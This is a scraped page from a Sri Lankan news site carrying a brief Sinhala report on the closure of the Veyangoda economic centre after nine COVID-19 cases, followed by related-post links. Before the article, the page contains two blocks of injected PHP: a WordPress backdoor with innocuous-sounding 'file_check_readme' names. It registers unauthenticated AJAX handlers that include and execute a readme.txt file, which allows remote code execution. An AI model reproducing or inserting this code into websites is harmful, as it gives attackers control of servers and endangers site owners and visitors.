if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } වේයන්ගොඩ ආර්ථික මධ්‍යස්ථානය වසා දමයි.. - mediahumanrights.lk
mediahumanrights.lk
Local News News

වේයන්ගොඩ ආර්ථික මධ්‍යස්ථානය වසා දමයි..

වේයන්ගොඩ ආර්ථික මධ්‍යස්ථානය ඊයේ රාත්‍රියේ සිට වසා දැමීමට කටයුතු කර තිබේ.

ගම්පහ දිස්ත්‍රික් ලේකම්වරයා සඳහන් කරන්නේ එම ආර්ථික මධ්‍යස්ථානයෙන් කොරෝනා ආසාදිතයන් 09 දෙනකු වාර්තා වීම හේතුවෙන් මෙම පියවර ගත් බවයි.

එම ආර්ථික මධ්‍යස්ථානයේ වෙළඳුන් හා සෙසු සේවකයන්ටත් කොරෝනා පරීක්ෂණ අද දිනයේ සිදු කරමින් පවතී.

නැවත එම මධ්‍යස්ථානය විවෘත කිරීම ගැන තීන්දුව ගනු ලබන්නේ මෙම කොරෝනා පරීක්ෂණවල ප්‍රතිඵල ලැබුණු පසු සෞඛ්‍ය උපදෙස් මත බවද දිස්ත්‍රික් ලේකම්වරයා කියා සිටියේ ය.

lankacnews

Related posts

දිවුලපිටියේ ඇඟළුම් කම්හලට කොවිඩ් ආවේ ජනප්‍රිය සංගීත කණ්ඩායමකින්ද ? පරීක්ෂණ අලුත් පැත්තකට

Shiran Viraj

පෙට්‍රල් සැපයුම අද යථා තත්ත්වයට

Shiran Viraj

දඹුල්ලේ සියළු පාසැල් වසා දැමේ..

Shiran Viraj